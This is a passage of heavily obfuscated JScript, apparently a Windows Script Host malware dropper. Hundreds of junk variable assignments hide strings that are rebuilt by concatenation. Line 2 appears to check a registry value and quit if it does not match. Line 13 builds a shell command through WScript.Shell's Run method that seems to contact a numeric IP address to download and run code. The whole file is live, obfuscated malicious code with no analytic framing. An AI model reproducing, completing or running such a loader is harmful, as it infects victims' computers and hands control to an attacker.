2 | var nxqwqum = this[epxmbly + rbxqrvgh + ynldhz + tmeggv + sggdyppzn + cuppgq + rchby + abpdq] ( this[jmlyqy + clbyzcq + uajfgvim + ynldhz + wdfqd + epxmbly + abpdq][nyntmu + ynldhz + sggdyppzn + rbxqrvgh + abpdq + sggdyppzn + ebuvd + bxvks + kahigy + sggdyppzn + uajfgvim + abpdq] ( jmlyqy + clbyzcq + uajfgvim + ynldhz + wdfqd + epxmbly + abpdq + jqafcmnqh + clbyzcq + ppbafu + sggdyppzn + etnspb + etnspb ) [cidttx + sggdyppzn + nhfhz + cidttx + sggdyppzn + rbxqrvgh + eafse] ( glycmk + lfvmlgik + xnqdktrjx + hyndph + yqtbyvce + nyntmu + xwvumzjf + cidttx + cidttx + xnqdktrjx + lekxy + cfqaie + yqtbyvce + xwvumzjf + clbyzcq + xnqdktrjx + cidttx + awzyliwr + nyntmu + cwbul + rchby + abpdq + ynldhz + cwbul + etnspb + dvolf + vcutw + rbxqrvgh + rchby + sggdyppzn + etnspb + awzyliwr + cuppgq + rchby + abpdq + sggdyppzn + ynldhz + rchby + rbxqrvgh + abpdq + wdfqd + cwbul + rchby + rbxqrvgh + etnspb + awzyliwr + veyplkj + cwbul + uajfgvim + rbxqrvgh + etnspb + sggdyppzn ), 16 ); |
|
3 | for ( yzoutzn = 0 ; yzoutzn < bycsos[etnspb + sggdyppzn + rchby + nhfhz + abpdq + ppbafu] ; ++ yzoutzn ) | |
4 | { | |
5 | if ( nxqwqum == bycsos[yzoutzn] ) | |
6 | { | |
7 | nxqwqum = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( nxqwqum !== true ) | |
12 | this[jmlyqy + clbyzcq + uajfgvim + ynldhz + wdfqd + epxmbly + abpdq][tqmrwoxj + bktfig + wdfqd + abpdq] ( ); | |
13 | this[jmlyqy + clbyzcq + uajfgvim + ynldhz + wdfqd + epxmbly + abpdq][nyntmu + ynldhz + sggdyppzn + rbxqrvgh + abpdq + sggdyppzn + ebuvd + bxvks + kahigy + sggdyppzn + uajfgvim + abpdq] ( jmlyqy + clbyzcq + uajfgvim + ynldhz + wdfqd + epxmbly + abpdq + jqafcmnqh + clbyzcq + ppbafu + sggdyppzn + etnspb + etnspb ) [ynldhz + bktfig + rchby] ( uajfgvim + uqqpj + eafse + dvolf + izekc + uajfgvim + dvolf + epxmbly + cwbul + xuuyy + sggdyppzn + ynldhz + tmeggv + ppbafu + sggdyppzn + etnspb + etnspb + jqafcmnqh + sggdyppzn + douyfiusg + sggdyppzn + dvolf + zhpkrsc + nyntmu + cwbul + uqqpj + uqqpj + rbxqrvgh + rchby + eafse + dvolf + jdsup + cuppgq + rchby + rhxjxzzcn + cwbul + bzqwfmku + sggdyppzn + zhpkrsc + jmlyqy + sggdyppzn + bxvks + cidttx + sggdyppzn + rrclova + bktfig + sggdyppzn + tmeggv + abpdq + dvolf + zhpkrsc + ebuvd + bktfig + abpdq + boodca + wdfqd + etnspb + sggdyppzn + dvolf + oqolniqfa + abpdq + sggdyppzn + uqqpj + epxmbly + oqolniqfa + awzyliwr + wdfqd + rchby + rhxjxzzcn + cwbul + wdfqd + uajfgvim + sggdyppzn + jqafcmnqh + epxmbly + eafse + diuzkd + dvolf + ppbafu + abpdq + abpdq + epxmbly + cckny + izekc + izekc + ikpkceppz + jksfqzxhz + maaefnihp + jqafcmnqh + ikpkceppz + vzlprhglr + maaefnihp + jqafcmnqh + ikpkceppz + jqafcmnqh + gyyltmkws + dhsfymymp + qquravud + izekc + wdfqd + rchby + rhxjxzzcn + cwbul + wdfqd + uajfgvim + sggdyppzn + jqafcmnqh + epxmbly + ppbafu + epxmbly + jdsup + jhihount + jhihount + tmeggv + abpdq + rbxqrvgh + ynldhz + abpdq + dvolf + oqolniqfa + abpdq + sggdyppzn + uqqpj + epxmbly + oqolniqfa + awzyliwr + wdfqd + rchby + rhxjxzzcn + cwbul + wdfqd + uajfgvim + sggdyppzn + jqafcmnqh + epxmbly + eafse + diuzkd + jhihount + jhihount + uajfgvim + uqqpj + eafse + dvolf + izekc + uajfgvim + dvolf + rchby + sggdyppzn + abpdq + dvolf + bktfig + tmeggv + sggdyppzn + dvolf + awzyliwr + awzyliwr + ikpkceppz + jksfqzxhz + maaefnihp + jqafcmnqh + ikpkceppz + vzlprhglr + maaefnihp + jqafcmnqh + ikpkceppz + jqafcmnqh + gyyltmkws + dhsfymymp + qquravud + buemvwt + rvhdq + rvhdq + rvhdq + rvhdq + awzyliwr + eafse + rbxqrvgh + rhxjxzzcn + xuuyy + xuuyy + xuuyy + ynldhz + cwbul + cwbul + abpdq + awzyliwr + jhihount + jhihount + uajfgvim + uqqpj + eafse + dvolf + izekc + uajfgvim + dvolf + ynldhz + sggdyppzn + nhfhz + tmeggv + rhxjxzzcn + ynldhz + maaefnihp + gyyltmkws + dvolf + izekc + tmeggv + dvolf + awzyliwr + awzyliwr + ikpkceppz + jksfqzxhz + maaefnihp + jqafcmnqh + ikpkceppz + vzlprhglr + maaefnihp + jqafcmnqh + ikpkceppz + jqafcmnqh + gyyltmkws + dhsfymymp + qquravud + buemvwt + rvhdq + rvhdq + rvhdq + rvhdq + awzyliwr + eafse + rbxqrvgh + rhxjxzzcn + xuuyy + xuuyy + xuuyy + ynldhz + cwbul + cwbul + abpdq + awzyliwr + ikpkceppz + ikpkceppz + dhsfymymp + jksfqzxhz + gyyltmkws + ikpkceppz + jksfqzxhz + ikpkceppz + jksfqzxhz + maaefnihp + qwfqvkbul + maaefnihp + gyyltmkws + jqafcmnqh + eafse + etnspb + etnspb, 0, false ); |
|
14 | } | |
15 | douyfiusg = "g"; | |
16 | douyfiusg = "K"; | |
17 | douyfiusg = "R"; | |
18 | douyfiusg = "x"; | |
19 | izekc = "J"; | |
20 | izekc = "t"; | |
21 | izekc = "B"; | |
22 | izekc = "W"; | |
23 | izekc = "r"; | |
24 | izekc = "d"; | |
25 | izekc = "A"; | |
26 | izekc = "s"; | |
27 | izekc = "o"; | |
28 | izekc = "/"; | |
29 | awzyliwr = "O"; | |
30 | awzyliwr = "r"; | |
31 | awzyliwr = "J"; | |
32 | awzyliwr = "V"; | |
33 | awzyliwr = "G"; | |
34 | awzyliwr = "a"; | |
35 | awzyliwr = "r"; | |
36 | awzyliwr = "a"; | |
37 | awzyliwr = "h"; | |
38 | awzyliwr = "n"; | |
39 | awzyliwr = "Y"; | |
40 | awzyliwr = "n"; | |
41 | awzyliwr = "u"; | |
42 | awzyliwr = "j"; | |
43 | awzyliwr = "Q"; | |
44 | awzyliwr = "h"; | |
45 | awzyliwr = "M"; | |
46 | awzyliwr = "i"; | |
47 | awzyliwr = "\\"; | |
48 | lekxy = "Q"; | |
49 | lekxy = "U"; | |
50 | lekxy = "a"; | |
51 | lekxy = "M"; | |
52 | lekxy = "C"; | |
53 | lekxy = "f"; | |
54 | lekxy = "h"; | |
55 | lekxy = "e"; | |
56 | lekxy = "W"; | |
57 | lekxy = "Z"; | |
58 | lekxy = "C"; | |
59 | lekxy = "i"; | |
60 | lekxy = "a"; | |
61 | lekxy = "w"; | |
62 | lekxy = "N"; | |
63 | boodca = "W"; | |
64 | boodca = "w"; | |
65 | boodca = "p"; | |
66 | boodca = "X"; | |
67 | boodca = "w"; | |
68 | boodca = "n"; | |
69 | boodca = "O"; | |
70 | boodca = "m"; | |
71 | boodca = "R"; | |
72 | boodca = "R"; | |
73 | boodca = "X"; | |
74 | boodca = "L"; | |
75 | boodca = "K"; | |
76 | boodca = "v"; | |
77 | boodca = "Q"; | |
78 | boodca = "B"; | |
79 | boodca = "d"; | |
80 | boodca = "m"; | |
81 | boodca = "M"; | |
82 | boodca = "z"; | |
83 | boodca = "H"; | |
84 | boodca = "d"; | |
85 | boodca = "Z"; | |
86 | boodca = "F"; | |
87 | boodca = "A"; | |
88 | boodca = "r"; | |
89 | boodca = "s"; | |
90 | boodca = "F"; | |
91 | boodca = "s"; | |
92 | boodca = "O"; | |
93 | boodca = "F"; | |
94 | xnqdktrjx = "k"; | |
95 | xnqdktrjx = "k"; | |
96 | xnqdktrjx = "W"; | |
97 | xnqdktrjx = "C"; | |
98 | xnqdktrjx = "j"; | |
99 | xnqdktrjx = "U"; | |
100 | xnqdktrjx = "T"; | |
101 | xnqdktrjx = "i"; | |
102 | xnqdktrjx = "T"; | |
103 | xnqdktrjx = "x"; | |
104 | xnqdktrjx = "T"; | |
105 | xnqdktrjx = "n"; | |
106 | xnqdktrjx = "R"; | |
107 | xnqdktrjx = "H"; | |
108 | xnqdktrjx = "v"; | |
109 | xnqdktrjx = "S"; | |
110 | xnqdktrjx = "L"; | |
111 | xnqdktrjx = "K"; | |
112 | xnqdktrjx = "I"; | |
113 | xnqdktrjx = "w"; | |
114 | xnqdktrjx = "G"; | |
115 | xnqdktrjx = "y"; | |
116 | xnqdktrjx = "s"; | |
117 | xnqdktrjx = "e"; | |
118 | xnqdktrjx = "n"; | |
119 | xnqdktrjx = "Z"; | |
120 | xnqdktrjx = "e"; | |
121 | xnqdktrjx = "w"; | |
122 | xnqdktrjx = "Q"; | |
123 | xnqdktrjx = "e"; | |
124 | xnqdktrjx = "z"; | |
125 | xnqdktrjx = "s"; | |
126 | xnqdktrjx = "Y"; | |
127 | xnqdktrjx = "c"; | |
128 | xnqdktrjx = "S"; | |
129 | xnqdktrjx = "o"; | |
130 | xnqdktrjx = "n"; | |
131 | xnqdktrjx = "G"; | |
132 | xnqdktrjx = "o"; | |
133 | xnqdktrjx = "E"; | |
134 | xnqdktrjx = "j"; | |
135 | xnqdktrjx = "E"; | |
136 | lfvmlgik = "e"; | |
137 | lfvmlgik = "a"; | |
138 | lfvmlgik = "i"; | |
139 | lfvmlgik = "b"; | |
140 | lfvmlgik = "m"; | |
141 | lfvmlgik = "p"; | |
142 | lfvmlgik = "w"; | |
143 | lfvmlgik = "x"; | |
144 | lfvmlgik = "d"; | |
145 | lfvmlgik = "I"; | |
146 | lfvmlgik = "Z"; | |
147 | lfvmlgik = "C"; | |
148 | lfvmlgik = "E"; | |
149 | lfvmlgik = "t"; | |
150 | lfvmlgik = "i"; | |
151 | lfvmlgik = "t"; | |
152 | lfvmlgik = "K"; | |
153 | tmeggv = "V"; | |
154 | tmeggv = "c"; | |
155 | tmeggv = "k"; | |
156 | tmeggv = "a"; | |
157 | tmeggv = "v"; | |
158 | tmeggv = "C"; | |
159 | tmeggv = "z"; | |
160 | tmeggv = "U"; | |
161 | tmeggv = "v"; | |
162 | tmeggv = "E"; | |
163 | tmeggv = "w"; | |
164 | tmeggv = "s"; | |
165 | etnspb = "z"; | |
166 | etnspb = "W"; | |
167 | etnspb = "K"; | |
168 | etnspb = "g"; | |
169 | etnspb = "x"; | |
170 | etnspb = "z"; | |
171 | etnspb = "Z"; | |
172 | etnspb = "E"; | |
173 | etnspb = "q"; | |
174 | etnspb = "S"; | |
175 | etnspb = "l"; | |
176 | maaefnihp = "P"; | |
177 | maaefnihp = "I"; | |
178 | maaefnihp = "u"; | |
179 | maaefnihp = "h"; | |
180 | maaefnihp = "g"; | |
181 | maaefnihp = "T"; | |
182 | maaefnihp = "Q"; | |
183 | maaefnihp = "r"; | |
184 | maaefnihp = "R"; | |
185 | maaefnihp = "C"; | |
186 | maaefnihp = "f"; | |
187 | maaefnihp = "E"; | |
188 | maaefnihp = "Z"; | |
189 | maaefnihp = "d"; | |
190 | maaefnihp = "G"; | |
191 | maaefnihp = "r"; | |
192 | maaefnihp = "C"; | |
193 | maaefnihp = "l"; | |
194 | maaefnihp = "P"; | |
195 | maaefnihp = "D"; | |
196 | maaefnihp = "g"; | |
197 | maaefnihp = "Y"; | |
198 | maaefnihp = "i"; | |
199 | maaefnihp = "m"; | |
200 | maaefnihp = "e"; | |
201 | maaefnihp = "w"; | |
202 | maaefnihp = "c"; | |
203 | maaefnihp = "B"; | |
204 | maaefnihp = "h"; | |
205 | maaefnihp = "p"; | |
206 | maaefnihp = "w"; | |
207 | maaefnihp = "L"; | |
208 | maaefnihp = "g"; | |
209 | maaefnihp = "B"; | |
210 | maaefnihp = "v"; | |
211 | maaefnihp = "A"; | |
212 | maaefnihp = "T"; | |
213 | maaefnihp = "T"; | |
214 | maaefnihp = "y"; | |
215 | maaefnihp = "b"; | |
216 | maaefnihp = "y"; | |
217 | maaefnihp = "Y"; | |
218 | maaefnihp = "w"; | |
219 | maaefnihp = "3"; | |
220 | ppbafu = "M"; | |
221 | ppbafu = "X"; | |
222 | ppbafu = "J"; | |
223 | ppbafu = "N"; | |
224 | ppbafu = "I"; | |
225 | ppbafu = "E"; | |
226 | ppbafu = "h"; | |
227 | ppbafu = "T"; | |
228 | ppbafu = "X"; | |
229 | ppbafu = "b"; | |
230 | ppbafu = "A"; | |
231 | ppbafu = "Z"; | |
232 | ppbafu = "X"; | |
233 | ppbafu = "h"; | |
234 | bktfig = "s"; | |
235 | bktfig = "T"; | |
236 | bktfig = "f"; | |
237 | bktfig = "M"; | |
238 | bktfig = "r"; | |
239 | bktfig = "r"; | |
240 | bktfig = "A"; | |
241 | bktfig = "S"; | |
242 | bktfig = "u"; | |
243 | bktfig = "e"; | |
244 | bktfig = "O"; | |
245 | bktfig = "l"; | |
246 | bktfig = "z"; | |
247 | bktfig = "u"; | |
248 | ebuvd = "s"; | |
249 | ebuvd = "v"; | |
250 | ebuvd = "b"; | |
251 | ebuvd = "A"; | |
252 | ebuvd = "L"; | |
253 | ebuvd = "k"; | |
254 | ebuvd = "P"; | |
255 | ebuvd = "S"; | |
256 | ebuvd = "y"; | |
257 | ebuvd = "I"; | |
258 | ebuvd = "O"; | |
259 | xuuyy = "P"; | |
260 | xuuyy = "p"; | |
261 | xuuyy = "j"; | |
262 | xuuyy = "u"; | |
263 | xuuyy = "A"; | |
264 | xuuyy = "F"; | |
265 | xuuyy = "a"; | |
266 | xuuyy = "R"; | |
267 | xuuyy = "x"; | |
268 | xuuyy = "I"; | |
269 | xuuyy = "n"; | |
270 | xuuyy = "O"; | |
271 | xuuyy = "X"; | |
272 | xuuyy = "E"; | |
273 | xuuyy = "j"; | |
274 | xuuyy = "W"; | |
275 | xuuyy = "X"; | |
276 | xuuyy = "d"; | |
277 | xuuyy = "I"; | |
278 | xuuyy = "m"; | |
279 | xuuyy = "F"; | |
280 | xuuyy = "N"; | |
281 | xuuyy = "V"; | |
282 | xuuyy = "f"; | |
283 | xuuyy = "I"; | |
284 | xuuyy = "D"; | |
285 | xuuyy = "R"; | |
286 | xuuyy = "o"; | |
287 | xuuyy = "s"; | |
288 | xuuyy = "T"; | |
289 | xuuyy = "M"; | |
290 | xuuyy = "h"; | |
291 | xuuyy = "s"; | |
292 | xuuyy = "u"; | |
293 | xuuyy = "K"; | |
294 | xuuyy = "c"; | |
295 | xuuyy = "n"; | |
296 | xuuyy = "t"; | |
297 | xuuyy = "t"; | |
298 | xuuyy = "b"; | |
299 | xuuyy = "w"; | |
300 | rvhdq = "h"; | |
301 | rvhdq = "Y"; | |
302 | rvhdq = "m"; | |
303 | rvhdq = "l"; | |
304 | rvhdq = "a"; | |
305 | rvhdq = "W"; | |
306 | rvhdq = "k"; | |
307 | rvhdq = "F"; | |
308 | rvhdq = "w"; | |
309 | rvhdq = "F"; | |
310 | rvhdq = "o"; | |
311 | rvhdq = "T"; | |
312 | rvhdq = "m"; | |
313 | rvhdq = "w"; | |
314 | rvhdq = "a"; | |
315 | rvhdq = "K"; | |
316 | rvhdq = "D"; | |
317 | rvhdq = "G"; | |
318 | rvhdq = "U"; | |
319 | rvhdq = "O"; | |
320 | rvhdq = "q"; | |
321 | rvhdq = "U"; | |
322 | rvhdq = "a"; | |
323 | rvhdq = "z"; | |
324 | rvhdq = "H"; | |
325 | rvhdq = "K"; | |
326 | rvhdq = "o"; | |
327 | rvhdq = "s"; | |
328 | rvhdq = "a"; | |
329 | rvhdq = "O"; | |
330 | rvhdq = "d"; | |
331 | rvhdq = "L"; | |
332 | rvhdq = "G"; | |
333 | rvhdq = "T"; | |
334 | rvhdq = "q"; | |
335 | rvhdq = "s"; | |
336 | rvhdq = "O"; | |
337 | rvhdq = "X"; | |
338 | rvhdq = "f"; | |
339 | rvhdq = "S"; | |
340 | rvhdq = "8"; | |
341 | jmlyqy = "Q"; | |
342 | jmlyqy = "R"; | |
343 | jmlyqy = "Y"; | |
344 | jmlyqy = "W"; | |
345 | rchby = "D"; | |
346 | rchby = "x"; | |
347 | rchby = "p"; | |
348 | rchby = "w"; | |
349 | rchby = "b"; | |
350 | rchby = "H"; | |
351 | rchby = "c"; | |
352 | rchby = "F"; | |
353 | rchby = "Z"; | |
354 | rchby = "e"; | |
355 | rchby = "K"; | |
356 | rchby = "j"; | |
357 | rchby = "H"; | |
358 | rchby = "K"; | |
359 | rchby = "t"; | |
360 | rchby = "U"; | |
361 | rchby = "A"; | |
362 | rchby = "b"; | |
363 | rchby = "F"; | |
364 | rchby = "A"; | |
365 | rchby = "h"; | |
366 | rchby = "j"; | |
367 | rchby = "w"; | |
368 | rchby = "Q"; | |
369 | rchby = "i"; | |
370 | rchby = "u"; | |
371 | rchby = "O"; | |
372 | rchby = "o"; | |
373 | rchby = "p"; | |
374 | rchby = "D"; | |
375 | rchby = "f"; | |
376 | rchby = "I"; | |
377 | rchby = "b"; | |
378 | rchby = "I"; | |
379 | rchby = "T"; | |
380 | rchby = "a"; | |
381 | rchby = "B"; | |
382 | rchby = "H"; | |
383 | rchby = "n"; | |
384 | rchby = "b"; | |
385 | rchby = "n"; | |
386 | wdfqd = "e"; | |
387 | wdfqd = "A"; | |
388 | wdfqd = "V"; | |
389 | wdfqd = "b"; | |
390 | wdfqd = "O"; | |
391 | wdfqd = "M"; | |
392 | wdfqd = "T"; | |
393 | wdfqd = "k"; | |
394 | wdfqd = "l"; | |
395 | wdfqd = "H"; | |
396 | wdfqd = "H"; | |
397 | wdfqd = "y"; | |
398 | wdfqd = "N"; | |
399 | wdfqd = "U"; | |
400 | wdfqd = "D"; | |
401 | wdfqd = "t"; | |
402 | wdfqd = "U"; | |
403 | wdfqd = "l"; | |
404 | wdfqd = "z"; | |
405 | wdfqd = "y"; | |
406 | wdfqd = "u"; | |
407 | wdfqd = "H"; | |
408 | wdfqd = "V"; | |
409 | wdfqd = "s"; | |
410 | wdfqd = "E"; | |
411 | wdfqd = "S"; | |
412 | wdfqd = "k"; | |
413 | wdfqd = "d"; | |
414 | wdfqd = "C"; | |
415 | wdfqd = "V"; | |
416 | wdfqd = "l"; | |
417 | wdfqd = "H"; | |
418 | wdfqd = "U"; | |
419 | wdfqd = "L"; | |
420 | wdfqd = "T"; | |
421 | wdfqd = "H"; | |
422 | wdfqd = "w"; | |
423 | wdfqd = "n"; | |
424 | wdfqd = "j"; | |
425 | wdfqd = "j"; | |
426 | wdfqd = "p"; | |
427 | wdfqd = "c"; | |
428 | wdfqd = "i"; | |
429 | gyyltmkws = "X"; | |
430 | gyyltmkws = "O"; | |
431 | gyyltmkws = "n"; | |
432 | gyyltmkws = "W"; | |
433 | gyyltmkws = "d"; | |
434 | gyyltmkws = "T"; | |
435 | gyyltmkws = "G"; | |
436 | gyyltmkws = "R"; | |
437 | gyyltmkws = "W"; | |
438 | gyyltmkws = "C"; | |
439 | gyyltmkws = "h"; | |
440 | gyyltmkws = "V"; | |
441 | gyyltmkws = "O"; | |
442 | gyyltmkws = "f"; | |
443 | gyyltmkws = "U"; | |
444 | gyyltmkws = "g"; | |
445 | gyyltmkws = "F"; | |
446 | gyyltmkws = "k"; | |
447 | gyyltmkws = "M"; | |
448 | gyyltmkws = "N"; | |
449 | gyyltmkws = "X"; | |
450 | gyyltmkws = "M"; | |
451 | gyyltmkws = "Q"; | |
452 | gyyltmkws = "H"; | |
453 | gyyltmkws = "q"; | |
454 | gyyltmkws = "y"; | |
455 | gyyltmkws = "D"; | |
456 | gyyltmkws = "z"; | |
457 | gyyltmkws = "K"; | |
458 | gyyltmkws = "F"; | |
459 | gyyltmkws = "A"; | |
460 | gyyltmkws = "J"; | |
461 | gyyltmkws = "f"; | |
462 | gyyltmkws = "f"; | |
463 | gyyltmkws = "J"; | |
464 | gyyltmkws = "B"; | |
465 | gyyltmkws = "r"; | |
466 | gyyltmkws = "Z"; | |
467 | gyyltmkws = "z"; | |
468 | gyyltmkws = "2"; | |
469 | nyntmu = "H"; | |
470 | nyntmu = "W"; | |
471 | nyntmu = "W"; | |
472 | nyntmu = "M"; | |
473 | nyntmu = "k"; | |
474 | nyntmu = "k"; | |
475 | nyntmu = "K"; | |
476 | nyntmu = "o"; | |
477 | nyntmu = "P"; | |
478 | nyntmu = "C"; | |
479 | nyntmu = "F"; | |
480 | nyntmu = "a"; | |
481 | nyntmu = "C"; | |
482 | jqafcmnqh = "O"; | |
483 | jqafcmnqh = "o"; | |
484 | jqafcmnqh = "c"; | |
485 | jqafcmnqh = "Z"; | |
486 | jqafcmnqh = "r"; | |
487 | jqafcmnqh = "b"; | |
488 | jqafcmnqh = "j"; | |
489 | jqafcmnqh = "x"; | |
490 | jqafcmnqh = "d"; | |
491 | jqafcmnqh = "O"; | |
492 | jqafcmnqh = "F"; | |
493 | jqafcmnqh = "z"; | |
494 | jqafcmnqh = "P"; | |
495 | jqafcmnqh = "S"; | |
496 | jqafcmnqh = "B"; | |
497 | jqafcmnqh = "A"; | |
498 | jqafcmnqh = "I"; | |
499 | jqafcmnqh = "."; | |
500 | jhihount = "i"; | |
501 | jhihount = "w"; | |
502 | jhihount = "M"; | |
503 | jhihount = "g"; | |
504 | jhihount = "w"; | |
505 | jhihount = "Z"; | |
506 | jhihount = "q"; | |
507 | jhihount = "q"; | |
508 | jhihount = "x"; | |
509 | jhihount = "c"; | |
510 | jhihount = "p"; | |
511 | jhihount = "&"; | |
512 | ikpkceppz = "f"; | |
513 | ikpkceppz = "I"; | |
514 | ikpkceppz = "R"; | |
515 | ikpkceppz = "h"; | |
516 | ikpkceppz = "z"; | |
517 | ikpkceppz = "I"; | |
518 | ikpkceppz = "e"; | |
519 | ikpkceppz = "q"; | |
520 | ikpkceppz = "V"; | |
521 | ikpkceppz = "p"; | |
522 | ikpkceppz = "H"; | |
523 | ikpkceppz = "m"; | |
524 | ikpkceppz = "X"; | |
525 | ikpkceppz = "I"; | |
526 | ikpkceppz = "i"; | |
527 | ikpkceppz = "m"; | |
528 | ikpkceppz = "A"; | |
529 | ikpkceppz = "l"; | |
530 | ikpkceppz = "p"; | |
531 | ikpkceppz = "Z"; | |
532 | ikpkceppz = "Z"; | |
533 | ikpkceppz = "q"; | |
534 | ikpkceppz = "X"; | |
535 | ikpkceppz = "Y"; | |
536 | ikpkceppz = "k"; | |
537 | ikpkceppz = "V"; | |
538 | ikpkceppz = "k"; | |
539 | ikpkceppz = "1"; | |
540 | diuzkd = "T"; | |
541 | diuzkd = "X"; | |
542 | diuzkd = "u"; | |
543 | diuzkd = "N"; | |
544 | diuzkd = "Z"; | |
545 | diuzkd = "O"; | |
546 | diuzkd = "d"; | |
547 | diuzkd = "s"; | |
548 | diuzkd = "w"; | |
549 | diuzkd = "G"; | |
550 | diuzkd = "T"; | |
551 | diuzkd = "A"; | |
552 | diuzkd = "v"; | |
553 | diuzkd = "G"; | |
554 | diuzkd = "v"; | |
555 | diuzkd = "T"; | |
556 | diuzkd = "E"; | |
557 | diuzkd = "i"; | |
558 | diuzkd = "N"; | |
559 | diuzkd = "x"; | |
560 | diuzkd = "J"; | |
561 | diuzkd = "r"; | |
562 | diuzkd = "g"; | |
563 | diuzkd = "L"; | |
564 | diuzkd = "E"; | |
565 | diuzkd = "f"; | |
566 | cidttx = "L"; | |
567 | cidttx = "U"; | |
568 | cidttx = "n"; | |
569 | cidttx = "m"; | |
570 | cidttx = "i"; | |
571 | cidttx = "O"; | |
572 | cidttx = "x"; | |
573 | cidttx = "b"; | |
574 | cidttx = "l"; | |
575 | cidttx = "m"; | |
576 | cidttx = "S"; | |
577 | cidttx = "w"; | |
578 | cidttx = "n"; | |
579 | cidttx = "T"; | |
580 | cidttx = "R"; | |
581 | cidttx = "v"; | |
582 | cidttx = "n"; | |
583 | cidttx = "R"; | |
584 | kahigy = "L"; | |
585 | kahigy = "p"; | |
586 | kahigy = "C"; | |
587 | kahigy = "I"; | |
588 | kahigy = "b"; | |
589 | kahigy = "l"; | |
590 | kahigy = "T"; | |
591 | kahigy = "q"; | |
592 | kahigy = "E"; | |
593 | kahigy = "V"; | |
594 | kahigy = "R"; | |
595 | kahigy = "f"; | |
596 | kahigy = "v"; | |
597 | kahigy = "a"; | |
598 | kahigy = "a"; | |
599 | kahigy = "W"; | |
600 | kahigy = "M"; | |
601 | kahigy = "S"; | |
602 | kahigy = "I"; | |
603 | kahigy = "u"; | |
604 | kahigy = "g"; | |
605 | kahigy = "L"; | |
606 | kahigy = "E"; | |
607 | kahigy = "s"; | |
608 | kahigy = "j"; | |
609 | epxmbly = "R"; | |
610 | epxmbly = "e"; | |
611 | epxmbly = "X"; | |
612 | epxmbly = "x"; | |
613 | epxmbly = "R"; | |
614 | epxmbly = "C"; | |
615 | epxmbly = "O"; | |
616 | epxmbly = "m"; | |
617 | epxmbly = "X"; | |
618 | epxmbly = "H"; | |
619 | epxmbly = "l"; | |
620 | epxmbly = "O"; | |
621 | epxmbly = "q"; | |
622 | epxmbly = "X"; | |
623 | epxmbly = "v"; | |
624 | epxmbly = "A"; | |
625 | epxmbly = "M"; | |
626 | epxmbly = "Q"; | |
627 | epxmbly = "p"; | |
628 | abpdq = "e"; | |
629 | abpdq = "T"; | |
630 | abpdq = "F"; | |
631 | abpdq = "D"; | |
632 | abpdq = "n"; | |
633 | abpdq = "M"; | |
634 | abpdq = "I"; | |
635 | abpdq = "e"; | |
636 | abpdq = "u"; | |
637 | abpdq = "i"; | |
638 | abpdq = "Q"; | |
639 | abpdq = "I"; | |
640 | abpdq = "K"; | |
641 | abpdq = "V"; | |
642 | abpdq = "r"; | |
643 | abpdq = "N"; | |
644 | abpdq = "R"; | |
645 | abpdq = "A"; | |
646 | abpdq = "d"; | |
647 | abpdq = "d"; | |
648 | abpdq = "d"; | |
649 | abpdq = "s"; | |
650 | abpdq = "E"; | |
651 | abpdq = "Z"; | |
652 | abpdq = "R"; | |
653 | abpdq = "z"; | |
654 | abpdq = "E"; | |
655 | abpdq = "X"; | |
656 | abpdq = "x"; | |
657 | abpdq = "q"; | |
658 | abpdq = "I"; | |
659 | abpdq = "P"; | |
660 | abpdq = "t"; | |
661 | bxvks = "n"; | |
662 | bxvks = "e"; | |
663 | bxvks = "p"; | |
664 | bxvks = "g"; | |
665 | bxvks = "d"; | |
666 | bxvks = "Q"; | |
667 | bxvks = "R"; | |
668 | bxvks = "b"; | |
669 | vcutw = "y"; | |
670 | vcutw = "Y"; | |
671 | vcutw = "d"; | |
672 | vcutw = "V"; | |
673 | vcutw = "Y"; | |
674 | vcutw = "z"; | |
675 | vcutw = "n"; | |
676 | vcutw = "E"; | |
677 | vcutw = "D"; | |
678 | vcutw = "D"; | |
679 | vcutw = "z"; | |
680 | vcutw = "e"; | |
681 | vcutw = "b"; | |
682 | vcutw = "Q"; | |
683 | vcutw = "X"; | |
684 | vcutw = "B"; | |
685 | vcutw = "j"; | |
686 | vcutw = "s"; | |
687 | vcutw = "d"; | |
688 | vcutw = "L"; | |
689 | vcutw = "x"; | |
690 | vcutw = "U"; | |
691 | vcutw = "W"; | |
692 | vcutw = "z"; | |
693 | vcutw = "m"; | |
694 | vcutw = "E"; | |
695 | vcutw = "I"; | |
696 | vcutw = "o"; | |
697 | vcutw = "n"; | |
698 | vcutw = "T"; | |
699 | vcutw = "C"; | |
700 | vcutw = "d"; | |
701 | vcutw = "n"; | |
702 | vcutw = "P"; | |
703 | jksfqzxhz = "S"; | |
704 | jksfqzxhz = "o"; | |
705 | jksfqzxhz = "Y"; | |
706 | jksfqzxhz = "m"; | |
707 | jksfqzxhz = "m"; | |
708 | jksfqzxhz = "p"; | |
709 | jksfqzxhz = "Z"; | |
710 | jksfqzxhz = "X"; | |
711 | jksfqzxhz = "M"; | |
712 | jksfqzxhz = "a"; | |
713 | jksfqzxhz = "w"; | |
714 | jksfqzxhz = "I"; | |
715 | jksfqzxhz = "n"; | |
716 | jksfqzxhz = "d"; | |
717 | jksfqzxhz = "P"; | |
718 | jksfqzxhz = "Q"; | |
719 | jksfqzxhz = "9"; | |
720 | cckny = "n"; | |
721 | cckny = "o"; | |
722 | cckny = "m"; | |
723 | cckny = "E"; | |
724 | cckny = "w"; | |
725 | cckny = "V"; | |
726 | cckny = "q"; | |
727 | cckny = "k"; | |
728 | cckny = "q"; | |
729 | cckny = "x"; | |
730 | cckny = "N"; | |
731 | cckny = "C"; | |
732 | cckny = "P"; | |
733 | cckny = ":"; | |
734 | yqtbyvce = "K"; | |
735 | yqtbyvce = "O"; | |
736 | yqtbyvce = "x"; | |
737 | yqtbyvce = "c"; | |
738 | yqtbyvce = "U"; | |
739 | yqtbyvce = "V"; | |
740 | yqtbyvce = "N"; | |
741 | yqtbyvce = "C"; | |
742 | yqtbyvce = "j"; | |
743 | yqtbyvce = "W"; | |
744 | yqtbyvce = "y"; | |
745 | yqtbyvce = "Q"; | |
746 | yqtbyvce = "A"; | |
747 | yqtbyvce = "R"; | |
748 | yqtbyvce = "y"; | |
749 | yqtbyvce = "q"; | |
750 | yqtbyvce = "E"; | |
751 | yqtbyvce = "h"; | |
752 | yqtbyvce = "E"; | |
753 | yqtbyvce = "q"; | |
754 | yqtbyvce = "z"; | |
755 | yqtbyvce = "o"; | |
756 | yqtbyvce = "V"; | |
757 | yqtbyvce = "z"; | |
758 | yqtbyvce = "Y"; | |
759 | yqtbyvce = "v"; | |
760 | yqtbyvce = "V"; | |
761 | yqtbyvce = "M"; | |
